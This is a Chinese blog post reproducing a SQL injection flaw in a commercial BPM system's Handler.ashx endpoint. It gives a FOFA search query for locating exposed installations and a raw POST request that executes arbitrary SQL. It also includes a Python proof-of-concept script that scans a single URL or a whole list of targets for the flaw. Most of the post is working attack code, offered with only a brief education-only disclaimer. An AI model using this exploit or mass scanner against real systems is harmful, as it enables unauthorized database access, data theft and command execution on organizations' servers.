【漏洞复现】某骋BPM系统——Handler.ashx——sql注入

于 2024-08-16 13:06:13 发布
阅读量121 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: sql 网络安全 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LongL_GuYu/article/details/141256920
版权

声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。

文章目录

漏洞描述

某骋BPM系统是一款功能全面的商业流程管理平台,旨在帮助企业实现业务流程的自动化和优化。该系统集成了工作流引擎、表单设计、报表分析等核心功能,可以帮助企业快速建立起标准化的业务流程,提高工作效率和管理透明度。某骋BPM支持多种行业应用场景,如采购审批、费用报销、合同管理等,拥有丰富的行业模板,能够快速部署上线。同时,系统提供可视化的流程建模工具,让业务人员也能轻松参与流程设计和优化。凭借强大的功能和出色的用户体验,驰骋BPM助力企业实现数字化转型,提升整体运营管理水平。其接口Handler.ashx存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息,也可通过数据库执行系统命令。

漏洞复现

信息收集
fofa:body="BP.WF.HttpHandler.WF_Portal"
在这里插入图片描述
清江一曲抱村流,长夏江村事事幽。
在这里插入图片描述
构造数据包

POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
Host:ip
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Length: 147

------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Disposition: form-data; name="SQL"

SELECT HASHBYTES('MD5', '123456')
------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--

在这里插入图片描述
成功回显,证明漏洞存在。

测试工具

poc

import requests
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    url = url.rstrip("/")
    target = urljoin(url, "/WF/Comm/Handler.ashx?DoType=RunSQL_Init")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1"
    }
    data='------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1\r\nContent-Disposition: form-data; name="SQL"\r\n\r\nSELECT HASHBYTES(\'MD5\', \'123456\')\r\n------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--'
    try:
        response = requests.post(target, verify=False, headers=headers, timeout=5,data=data)
        if response.status_code == 200 and '4QrcOUm6Wau+VuBX8g+IPg==' in response.text :
            print(f"\033[31mDiscovered:{url}: CCBPM_Handler_Init_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

运行截图
在这里插入图片描述

人们之所以会怀念故乡,是因为心爱的人就在故乡。

Long._.L
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android——Handler详解
skdin的博客
08-30 3345
Hander详解
jquery向.ashx文件post中文乱码问题的解决方法
10-28
在使用jquery向服务器端的.ashx处理程序进行POST操作时,中文乱码问题是一个常见的困扰。.ashx文件通常被用作处理简单的HTTP请求,并返回一些响应给客户端。当涉及到中文字符时,如果没有正确处理字符编码,就可能...
Web安全漏洞原理——SQL注入
changyu233的博客
04-17 3355
Web安全漏洞原理——SQL注入 SQL注入 原理 ​ 由于程序员对插入SQL语句的用户输入参数检查不严格,导致的恶意SQL命令被插入语句并执行。 ​ 例如: ​ 原始查询语句为 select * from user where id=$value ​ $value为用户输入变量,由于没有过滤,在用户输入 1 and 1=2时 ​ 查询语句变为 select * from user where id=1 and 1=2,返回永假页面。 SQL数据库重要信息 MySQL数据库 默认数据库: ​ i
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3212
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
Handler 源码解析——Handler的创建
紫雾凌寒
08-18 2937
前言 Android 提供了Handler和Looper来来满足线程间的通信,而前面我们所说的IPC指的是进程间的通信。这是两个完全不同的概念。 Handler先进先出原则,Looper类用来管理特定线程内消息的交换(MessageExchange); 1、为什么会有Handler机制? 我们刚说Handler机制的主要作用是将某一任务切换到特定的线程来执行,我们做项目可能都遇到过AN...
ASP.NET一般处理文件Handler.ashx属性IsReusable详解
热门推荐
我想我是海 冬天的大海 心情随风轻摆
07-30 1万+
利用ASP.NET开发网站,比较多使用的是ASPX文件,很少使用ASHX文件,但ASHX在有些方面还是蛮实用的,如图片防盗链、验证码、AJAX读数据等,而且速度也快点,省去了Page类生命周期这些步骤。ASHX有个IsReusable属性,很多人对此有疑惑,以下为你详细解答: IsResuable属性指示是否可以重用于其他IHttpHandler实例,那么什么时候可以设置为true,什么时候不能
CTF——sql注入之堆叠注入整理
weixin_51735061的博客
03-04 5702
sql注入中的堆叠注入的整理。整理基于“强网杯2019随便注”
用Jquery访问Handler.ashx并返回Json
08-24 4283
Default.html前台页面代码http://www.w3.org/1999/xhtml" >    无标题页        $(document).ready(function (){        $("#btnOK").click(function (){            $.getJSON(                "Handler.ashx",              
C# 创建.ashx文件 (一般处理程序) Generic Handler
zam183的博客
04-17 2589
背景:web项目 好久没处理了,简单的都忘记了。不应该,不应该。
Android Studio——android中handler用法总结
qq_37746927的博客
09-24 3860
一、Handler的定义: Handler主要接收子线程发送的数据, 并用此数据配合主线程更新UI,用来跟UI主线程交互用。比如可以用handler发送一个message,然后在handler的线程中来接收、处理该消息,以避免直接在UI主线程中处理事务导致影响UI主线程的其他处理工作,Android提供了Handler作为主线程和子线程的纽带;也可以将handler对象传给其他进程,以便在其他进程...
FreeRTOS的学习(七)——3.队列出队源码分析
LEOD的博客
05-22 1263
队列在FreeRTOS中起到比较重要的作用,主要用于任务之间消息的传递,取代了裸机时代中的全局变量交互功能。队列的机制实现了任务与任务、任务与中断之间的消息传递。
安卓Android源码——HandlerMessage3.rar
10-11
这个压缩包"安卓Android源码——HandlerMessage3.rar"很可能包含了关于这三者如何协同工作的示例代码或者详细分析。现在,我们将深入探讨这些概念及其在Android系统中的作用。 `Handler` 是一个用于发送和处理消息...
安卓Android源码——HandlerLooper2.rar
10-11
这个压缩包“安卓Android源码——HandlerLooper2.rar”可能包含了关于这些组件的深入分析和示例代码。以下是关于`Handler`、`Looper`和`MessageQueue`的详细解释: 1. **Handler**: - `Handler`是Android中的一个...
安卓Android源码——HandlerMessage2.rar
10-11
本资源"安卓Android源码——HandlerMessage2.rar"可能包含了关于`Handler`和`Message`的深入实践和示例代码,下面我们将详细探讨这些核心组件。 `Handler` 是 Android 中用于在线程间传递消息的对象。它通常用于将...
移动应用开发——Android.zip
最新发布
04-20
这个名为"移动应用开发——Android.zip"的压缩包很可能包含了一系列关于Android应用开发的学习资料,包括教程、代码示例、项目案例等,旨在帮助开发者深入理解Android平台的开发流程和技术要点。 Android应用开发...
安卓Android源码——HandlerLooper1.rar
10-11
在Android系统中,`Handler`、`Looper`和`MessageQueue`是三个核心组件,它们共同构成了Android消息处理机制,使得应用程序能够实现线程间的通信和异步任务执行。这个`HandlerLooper1.rar`文件可能包含了对这些概念...
安卓Android源码——HandlerMessage1.rar
10-11
在安卓(Android)开发中,`Handler`、`Message` 和 `Looper` 是三个非常重要的组件,它们共同构成了安卓的异步消息处理机制。这个机制是安卓系统中处理UI线程与后台线程通信的核心方式。`HandlerMessage1.rar` 文件...
SSM项目 拦截器(csdn)————程序.pdf
12-04
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { String requestURI = request.getRequestURI(); log.info("被拦截的请求有:{}", ...
javaNIO学习笔记(csdn)————程序.pdf
12-01
- **I/O多路复用(select/poll/epoll)**:线程阻塞于select调用,当任一描述符准备好时,系统调用返回,然后进行数据读写。 - **信号驱动式I/O(sigio)**:内核通过信号通知应用程序数据已准备好。 - **异步I/O**...
handler.sendMessage 和handler.post 有什么区别
05-11
`handler.sendMessage()` 和 `handler.post()` 都是用于将消息传递给 Handler 处理的方法,但是它们的使用有一些区别。 `handler.sendMessage()` 方法是在消息队列中插入一条消息,并立即返回,这意味着它是同步的。也就是说,如果你调用了 `handler.sendMessage()`,那么它会等待 Handler 处理完该消息后才会继续执行下面的代码。 `handler.post()` 方法是将一条消息投递到消息队列中,并返回 true。这是一个异步操作,意味着投递的消息会在稍后的某个时间被 Handler 处理。也就是说,如果你调用了 `handler.post()`,那么它不会等待 Handler 处理完该消息,而是会立即继续执行下面的代码。 因此,如果你需要立即执行某些代码,而不必等待 Handler 处理完消息后再执行,那么应该使用 `handler.post()` 方法。如果你需要等待 Handler 处理完消息后再执行下面的代码,那么应该使用 `handler.sendMessage()` 方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值